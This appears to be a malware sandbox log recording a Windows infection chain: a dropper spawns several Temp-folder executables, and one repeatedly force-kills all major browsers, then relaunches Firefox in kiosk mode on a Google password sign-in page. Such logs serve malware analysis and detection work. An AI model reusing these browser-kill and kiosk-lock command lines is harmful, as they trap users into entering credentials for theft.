Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe "C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe"
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000979001\num.exe "C:\Users\user\AppData\Local\Temp\1000979001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2140 -parentBuildID 20230927232528 -prefsHandle 2076 -prefMapHandle 2068 -prefsLen 26596 -prefMapSize 238335 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02f5810b-dd2b-4de0-96e0-9800a8c8aecc} 3780 "\\.\pipe\gecko-crash-server-pipe.3780" 1a0b0b6ff10 socket
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe "C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe "C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe "C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe "C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe "C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe "C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000979001\num.exe "C:\Users\user\AppData\Local\Temp\1000979001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2184 -parentBuildID 20230927232528 -prefsHandle 2132 -prefMapHandle 2128 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b40077cd-dd11-4133-b7ff-87ccb7cbcf33} 7456 "\\.\pipe\gecko-crash-server-pipe.7456" 1378e86ed10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2948 -parentBuildID 20230927232528 -prefsHandle 4268 -prefMapHandle 3212 -prefsLen 30974 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ae1ecd2-7e69-4001-87b4-63ef548d530a} 7456 "\\.\pipe\gecko-crash-server-pipe.7456" 1379e087210 rdd
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2140 -parentBuildID 20230927232528 -prefsHandle 2076 -prefMapHandle 2068 -prefsLen 26596 -prefMapSize 238335 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02f5810b-dd2b-4de0-96e0-9800a8c8aecc} 3780 "\\.\pipe\gecko-crash-server-pipe.3780" 1a0b0b6ff10 socket
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: gpapi.dll Jump to behavior
